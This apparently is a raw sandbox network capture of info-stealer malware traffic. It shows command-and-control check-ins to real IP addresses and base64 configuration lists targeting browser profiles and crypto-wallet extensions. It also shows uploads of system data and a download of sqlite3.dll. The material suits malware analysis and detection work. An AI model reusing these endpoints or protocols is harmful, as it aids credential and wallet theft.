Dec 22, 2024 02:18:05.848172903 CET	1236	IN	Data Raw: 59 c7 51 60 55 37 4f 95 8e ab df 97 31 9c df 27 57 bd b4 23 59 c7 51 b8 55 37 4f 95 18 37 df 97 31 9c df 27 57 bd b4 23 59 c7 51 a8 55 37 4f 95 94 ac df 97 31 9c df 27 57 bd b4 23 59 c7 51 fe 55 37 4f 95 94 ac df 97 31 9c df 27 57 bd b4 23 59 c7 Data Ascii: YQ`U7O1'W#YQU7O71'W#YQU7O1'W#YQU7O1'W#YQBX7O1'W2YQX7O1'W2YQY7O1'W2YQFW7O1'W2YQW7O1'WY7'Y'Y7'Y7'Y'Y'Y'Y'\<7-3Jm&Y7'Y'Y+Y)*
Dec 22, 2024 02:18:05.968091011 CET	1236	IN	Data Raw: 59 37 df 27 59 b7 df f6 39 26 f9 53 5c b1 df 27 59 37 df a7 59 1c 00 af 58 7f e0 30 59 37 df 27 59 b7 df f6 39 d1 f8 66 5c a4 df 27 59 37 df a7 59 1c 00 03 56 ee e0 2b 59 37 df 27 59 b7 df f6 39 68 fc b8 5c a6 df 27 59 37 df a7 59 1c 00 02 56 e1 Data Ascii: Y7'Y9&S\'Y7YX0Y7'Y9f\'Y7YV+Y7'Y9h\'Y7YVtY7'Y9\97'YXY/'Y7Y\G<7'YCTY'Y7Y\<7'YUY'Y7Y\\<7'YuTY'Y7A0Y'97'Y7&Y&YS$Y&YjX7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50097	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:04.939801931 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:06.199645996 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:05 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50107	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:08.427165985 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:09.705137968 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:09 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50121	185.215.113.206	80	7748	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:10.528225899 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:11.798858881 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 22, 2024 02:18:11.992114067 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 42 37 45 33 44 43 45 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"E36B7E3DCE4E758809014------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"stok------EBKKKEGIDBGHIDGDHDBF--
Dec 22, 2024 02:18:12.441946983 CET	407	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 44 46 69 4e 47 56 6a 4f 57 45 78 59 7a 49 79 4e 32 4d 30 59 54 63 7a 4e 44 67 31 4f 57 4a 68 4f 44 55 79 5a 6a 63 77 5a 6a 42 69 4f 44 4e 6d 5a 6a 6c 69 4f 57 52 69 4e 54 41 33 4d 57 56 6b 4d 32 45 35 4d 6d 4a 69 4e 44 6c 69 4e 6a 55 77 59 7a 45 77 4d 57 4a 6c 4f 57 52 6a 59 54 45 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NDFiNGVjOWExYzIyN2M0YTczNDg1OWJhODUyZjcwZjBiODNmZjliOWRiNTA3MWVkM2E5MmJiNDliNjUwYzEwMWJlOWRjYTEyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 22, 2024 02:18:12.528701067 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAF Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="message"browsers------ECBKKKFHCFIDHIECGCAF--
Dec 22, 2024 02:18:12.967668056 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 22, 2024 02:18:12.967823029 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 22, 2024 02:18:13.003951073 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 2d 2d 0d 0a Data Ascii: ------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="message"plugins------DHCGIDHDAKJECBFHCBAA--
Dec 22, 2024 02:18:13.443103075 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:13 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 22, 2024 02:18:13.443285942 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 22, 2024 02:18:13.443341970 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 22, 2024 02:18:13.443434000 CET	672	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Dec 22, 2024 02:18:13.443620920 CET	1236	IN	Data Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32 Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
Dec 22, 2024 02:18:13.443655968 CET	1236	IN	Data Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44 Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHw
Dec 22, 2024 02:18:13.451554060 CET	492	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58 Data Ascii: IFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1
Dec 22, 2024 02:18:13.812210083 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECB Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="message"fplugins------KFIEHIIIJDAAAAAAKECB--
Dec 22, 2024 02:18:14.250932932 CET	335	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 22, 2024 02:18:14.361412048 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDG Host: 185.215.113.206 Content-Length: 8275 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:14.361442089 CET	8275	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 Data Ascii: ------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 22, 2024 02:18:15.340879917 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 22, 2024 02:18:15.713258982 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
